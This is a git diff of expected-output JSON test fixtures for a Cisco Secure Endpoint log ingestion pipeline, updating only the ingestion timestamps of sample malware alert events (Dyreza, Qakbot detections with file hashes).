@@ -3388,7 +3388,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337274600Z", + "ingested": "2021-12-14T14:40:41.774862464Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258014979293000,\"timestamp\":1610705609,\"timestamp_nanoseconds\":581000000,\"date\":\"2021-01-15T10:13:29+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258014979293255\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -3468,7 +3468,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337280500Z", + "ingested": "2021-12-14T14:40:41.774862876Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176257963439686000,\"timestamp\":1610705597,\"timestamp_nanoseconds\":569000000,\"date\":\"2021-01-15T10:13:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176257963439685702\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -3558,7 +3558,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337286500Z", + "ingested": "2021-12-14T14:40:41.774863330Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667579691532000,\"timestamp\":1610705573,\"timestamp_nanoseconds\":778000000,\"date\":\"2021-01-15T10:12:53+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533667579691532307\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -3644,7 +3644,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337292400Z", + "ingested": "2021-12-14T14:40:41.774863767Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667579691532000,\"timestamp\":1610705573,\"timestamp_nanoseconds\":747000000,\"date\":\"2021-01-15T10:12:53+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6533667579691532306\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -3734,7 +3734,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337298300Z", + "ingested": "2021-12-14T14:40:41.774864200Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667579691532000,\"timestamp\":1610705573,\"timestamp_nanoseconds\":371000000,\"date\":\"2021-01-15T10:12:53+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6533667579691532305\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -3820,7 +3820,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337304300Z", + "ingested": "2021-12-14T14:40:41.774864733Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667575396565000,\"timestamp\":1610705572,\"timestamp_nanoseconds\":971000000,\"date\":\"2021-01-15T10:12:52+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6533667575396565008\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp4.log-expected.json b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp4.log-expected.json index f413457f352..2767b10af51 100644 
--- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp4.log-expected.json +++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp4.log-expected.json @@ -38,7 +38,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:39.763772800Z", + "ingested": "2021-12-14T14:40:45.520850552Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6508397899087348000,\"timestamp\":1610659036,\"timestamp_nanoseconds\":295927133,\"date\":\"2021-01-14T21:17:16+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.6A37D750F0-100.SBX.TG\",\"detection_id\":\"6508397899087347713\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"resume.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Desktop\\\\resume.exe\",\"identity\":{\"sha256\":\"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86\",\"sha1\":\"5ca4bef8de6def53519d4b22632675bb4c1e470b\",\"md5\":\"41476df3138717868118d8542cf3d1d6\"}}}}", "code": "553648147", "kind": "alert", 
@@ -117,7 +117,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:39.763777600Z", + "ingested": "2021-12-14T14:40:45.520853328Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":14930696955218,\"timestamp\":1610656706,\"timestamp_nanoseconds\":844899579,\"date\":\"2021-01-14T20:38:26+00:00\",\"event_type\":\"Executed malware\",\"event_type_id\":1107296272,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610656706,\"start_date\":\"2021-01-14T20:38:26+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}}", "code": "1107296272", "kind": "alert", 
@@ -194,7 +194,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763782800Z", + "ingested": "2021-12-14T14:40:45.520853890Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":587000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6412680266518626319\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -270,7 +270,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763788800Z", + "ingested": "2021-12-14T14:40:45.520854373Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":494000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6412680266518626317\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -367,7 +367,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763794800Z", + "ingested": "2021-12-14T14:40:45.520854900Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":587000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"detection_id\":\"6412680266518626319\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"28242311.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\28242311.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"},\"parent\":{\"process_id\":7120,\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\",\"sha1\":\"f504774b72acfb23a46217aec9c6559fd7e4df64\",\"md5\":\"b5ede95ec8bc4ad6984758be42b152bd\"}}}}}", "code": "1090519054", "kind": "alert", 
@@ -461,7 +461,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763799500Z", + "ingested": "2021-12-14T14:40:45.520855346Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":572000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"detection_id\":\"6412680266518626318\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\QuotaGroup\\\\QuotaGroup.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\",\"sha1\":\"f504774b72acfb23a46217aec9c6559fd7e4df64\",\"md5\":\"b5ede95ec8bc4ad6984758be42b152bd\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -554,7 +554,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763804100Z", + "ingested": "2021-12-14T14:40:45.520855854Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":494000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"detection_id\":\"6412680266518626317\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"28242311.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\28242311.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"},\"parent\":{\"process_id\":4788,\"disposition\":\"Malicious\",\"file_name\":\"28242311.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}}", "code": "1090519054", "kind": "alert", 
@@ -648,7 +648,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763807800Z", + "ingested": "2021-12-14T14:40:45.520857326Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":478000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"detection_id\":\"6412680266518626316\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"28242311.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\28242311.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\",\"sha1\":\"f504774b72acfb23a46217aec9c6559fd7e4df64\",\"md5\":\"b5ede95ec8bc4ad6984758be42b152bd\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -722,7 +722,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763812600Z", + "ingested": "2021-12-14T14:40:45.520857842Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":587000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6412680266518626318\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}", "code": "553648143", "kind": "alert", 
@@ -794,7 +794,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763818700Z", + "ingested": "2021-12-14T14:40:45.520858327Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":494000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6412680266518626316\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}", "code": "553648143", "kind": "alert", 
